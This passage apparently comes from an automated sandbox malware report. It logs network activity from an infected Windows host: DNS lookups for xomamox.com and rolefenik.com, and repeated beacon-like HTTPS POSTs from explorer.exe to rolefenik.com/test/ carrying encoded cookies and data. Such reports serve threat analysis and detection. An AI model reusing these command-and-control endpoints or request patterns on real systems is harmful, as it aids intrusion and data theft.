                                                                                                                                                          Nov 13, 2024 11:03:25.399539948 CET58114443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:25.399561882 CET44358114172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:26.346013069 CET88775811380.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:26.346091032 CET581138877192.168.2.880.66.76.106

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Nov 13, 2024 10:59:22.337012053 CET5843153192.168.2.81.1.1.1
                                                                                                                                                          Nov 13, 2024 10:59:23.354455948 CET5843153192.168.2.81.1.1.1
                                                                                                                                                          Nov 13, 2024 10:59:23.428050995 CET53584311.1.1.1192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:23.428069115 CET53584311.1.1.1192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:35.451606989 CET53559221.1.1.1192.168.2.8
                                                                                                                                                          Nov 13, 2024 10:59:49.109538078 CET53520861.1.1.1192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:02.907955885 CET4964553192.168.2.81.1.1.1
                                                                                                                                                          Nov 13, 2024 11:02:03.095415115 CET53496451.1.1.1192.168.2.8

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Nov 13, 2024 10:59:22.337012053 CET192.168.2.81.1.1.10x3a16Standard query (0)xomamox.comA (IP address)IN (0x0001)false
                                                                                                                                                          Nov 13, 2024 10:59:23.354455948 CET192.168.2.81.1.1.10x3a16Standard query (0)xomamox.comA (IP address)IN (0x0001)false
                                                                                                                                                          Nov 13, 2024 11:02:02.907955885 CET192.168.2.81.1.1.10x2516Standard query (0)rolefenik.comA (IP address)IN (0x0001)false

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Nov 13, 2024 10:59:23.428050995 CET1.1.1.1192.168.2.80x3a16No error (0)xomamox.com80.66.76.106A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 13, 2024 10:59:23.428069115 CET1.1.1.1192.168.2.80x3a16No error (0)xomamox.com80.66.76.106A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 13, 2024 11:02:03.095415115 CET1.1.1.1192.168.2.80x2516No error (0)rolefenik.com172.67.191.232A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 13, 2024 11:02:03.095415115 CET1.1.1.1192.168.2.80x2516No error (0)rolefenik.com104.21.92.105A (IP address)IN (0x0001)false

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • rolefenik.com

                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.858086172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:03 UTC411OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1lHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 92
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:03 UTC92OUTData Raw: 55 61 54 62 71 55 73 54 30 33 6f 7a 44 37 30 2b 5a 6f 59 4b 49 69 30 32 54 37 78 53 6d 6e 34 4b 57 2f 33 75 55 38 7a 4b 49 34 31 4b 38 46 61 53 5a 57 59 54 6f 4d 78 32 61 6e 4f 31 67 47 55 50 43 71 39 74 55 44 39 47 57 33 78 4b 63 55 39 42 77 49 74 72 76 78 68 70 38 78 4d 3d
                                                                                                                                                          Data Ascii: UaTbqUsT03ozD70+ZoYKIi02T7xSmn4KW/3uU8zKI41K8FaSZWYToMx2anO1gGUPCq9tUD9GW3xKcU9BwItrvxhp8xM=
                                                                                                                                                          2024-11-13 10:02:05 UTC783INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:05 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxjpZAvChrW4IcYpjelq4GYv2r6Tg1NTx%2BhC3YIC%2Fm%2BXHBTbixVaRiP9xHKtpsQhLCw0SjGhax%2Fb9woyqnQldgvMVGPkQg6IgS6SHRl15tSPJLaz1gyVBAvCUg0XZJJc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1dec8dd8072c9a-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2128&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1163&delivery_rate=1343228&cwnd=250&unsent_bytes=0&cid=9aabcecc38127dfd&ts=2021&x=0"
                                                                                                                                                          2024-11-13 10:02:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.858087172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:07 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:09 UTC789INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:09 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8%2FjJF%2BPPf6%2FModTtMzNFfHJqnA3v8Irep3oTYJcTTww77S%2FWiTrJUstclTkjvUkjepqXuXCgIjKHJ8FIQ4QRUWGEUVBnDxs7gn%2FV9Tjb%2BFraxf1wG%2FzHkJM8VMGXYGD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1deca3efef6c64-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2155&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1344475&cwnd=251&unsent_bytes=0&cid=24e7d92256927b6f&ts=2313&x=0"
                                                                                                                                                          2024-11-13 10:02:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.858088172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:10 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1nHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:12 UTC793INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:12 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oKtGQCdLxR%2FNq6eImsZSkcjTrJua%2F%2Bomg8VC2w%2F4xwRZIJoD2uon2tHwY8rgF6t%2FS7jMCkS3Q3OB1dHAjjqUtF%2F%2FpFtK%2BI4ZjGA92IpW11gXEH%2FCnFPUsRXqPeuKcy8x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1decb6cb73e5ad-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1958&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2578806&cwnd=250&unsent_bytes=0&cid=16a7955d034298eb&ts=1963&x=0"
                                                                                                                                                          2024-11-13 10:02:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          3192.168.2.858089172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:13 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1mHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:15 UTC785INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:15 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUNN2pwwS%2Ft9eDthAEIEk5%2FpTT3KUC2%2B%2BtE99n4ke9BI63tyBxeWNrsVwBIwWttMv6c6Dh9zYhqiGUkMJdMzdQeQM01rG%2F5r4hmGdjloU1e3b3MkJLDkOYqnH12mDrcb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1decc8ccf0464a-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1059&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=2664213&cwnd=252&unsent_bytes=0&cid=4eeb06d830acd2c5&ts=2385&x=0"
                                                                                                                                                          2024-11-13 10:02:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          4192.168.2.858090172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:16 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1hHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:19 UTC777INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:19 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NRsmTK4zECRTJZbRLJeJWTkBxSyjVw01SahKGcHa9o6LZwCKFxHK3WXk%2BNvuhFmJvACPf48cBsSaanMWCxKMCBRYBtQ0Ipx14rfo4sXGQWZZvzc6ebbHKBINwhujH9nH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1decdd7f24e9a9-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1283&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2239752&cwnd=251&unsent_bytes=0&cid=848785e1b458740b&ts=3014&x=0"
                                                                                                                                                          2024-11-13 10:02:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          5192.168.2.858091172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:20 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1gHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:22 UTC783INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:22 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQNUcqeVNp32%2F7czGTTqIEk6%2FM7vTWFCZX4vXrDXix09COSyQNTTEoEvHKUwYMZJ4%2FVGEnjiTctJwHBBaDjQa6jsHXbxN5hDMZ5ouJxYVr%2BOoeYGjgvBjA0CAm7RJIuf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1decf49a9e485b-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1245&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2253696&cwnd=251&unsent_bytes=0&cid=6a382d649e7278b1&ts=2048&x=0"
                                                                                                                                                          2024-11-13 10:02:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          6192.168.2.858092172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:23 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1jHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:24 UTC793INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:24 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qA%2BsbJhOPtU%2B95KhJ%2Bji0zy6y%2F0xlii2Ijupzl2Z53I%2Fu%2BjPs9Sa6pgH1OFRfhO57EgkNAZ8YfWhTIR%2FQIqx5464tWJtGEQXFr4sfx%2BAva5EyVqBAtQHg0iz%2F9TbGYYr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1ded06796a6c6f-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1037&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2781940&cwnd=251&unsent_bytes=0&cid=d94a501b40f9f825&ts=2000&x=0"
                                                                                                                                                          2024-11-13 10:02:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          7192.168.2.858093172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:25 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1iHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:27 UTC782INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:27 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDQiSyFx26fpPO4tKmCT%2BKF9MxYr7qBWn8bdhf6fffrpw7s85UmSiSxkLWkBJrAbF2flXSBE%2B4JAEMVWzJTVQ2QGDqSW9FgU5ZE%2FDlLnukw21lTweV06X8fGP1Re%2BZi8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1ded1749aee6fe-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1365&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2042313&cwnd=57&unsent_bytes=0&cid=96c8181b89276181&ts=2044&x=0"
                                                                                                                                                          2024-11-13 10:02:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          8192.168.2.858094172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:28 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1tHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:30 UTC781INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:30 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XwfD%2Bs1C64DiNStTKRstp0GWmUlnJS1Lxf2RGkDsJyVXoRz595KK9s7LC25OVqYd5ndjsK%2FfPds9OQ0zVy8wl6LMV9vKWNVyeFfiuYQfl66w8%2FjKgz6BNPR3pQEyqAe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1ded2859ca4686-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1137&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2487972&cwnd=251&unsent_bytes=0&cid=1d40b5195cb4b183&ts=2114&x=0"
                                                                                                                                                          2024-11-13 10:02:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          9192.168.2.858095172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:31 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1sHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:33 UTC781INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:33 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2BScuoTYXAHnYeyz1HknKvaUXmjKiG1Ajilq9VQXXpxfstkq%2B3lSuXaBxCXAEcgC%2FBmuy8w0uYiKjNJvNjXlPTPYB1DIip8aiOduNsfa8Mwkux9wCmmG34Dc7d8v2CME"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8e1ded39bf106c3a-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1049&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2627949&cwnd=251&unsent_bytes=0&cid=50a744fef820d350&ts=2016&x=0"
                                                                                                                                                          2024-11-13 10:02:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          10192.168.2.858096172.67.191.2324434084C:\Windows\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-11-13 10:02:33 UTC414OUTPOST /test/ HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: FKbPpAITwn1kC6EofcxbKiZ2HvMCnXgeCqG3YfiNd8gW0Am0GWoYrLh6amOQ2TooIoNiW3Z7BycJVgB15+QR3j9VwzEXaDOAt2XCtXpPQBVIu2iZJ3SKsK2uMP0cRBnJO/qLbRMwRlM0cAkWC/OgefhisC4jOsFSw+09tc8mdDzsbQYeAA==
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                          Host: rolefenik.com
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-11-13 10:02:35 UTC779INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 13 Nov 2024 10:02:35 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A5nH3amZnMJcA%2Ft4R7c2mg7DuDB7PvG%2B5n5dLwvYxEGany0WbwDhuJLSplg14tXmXMbYikSUpNalFFNip9eATW3U0ZxuW46MFzg2jT4n03V7gVtY8HH9KhtPTf0MTBcy"}],"group":"cf-nel","max_age":604800}
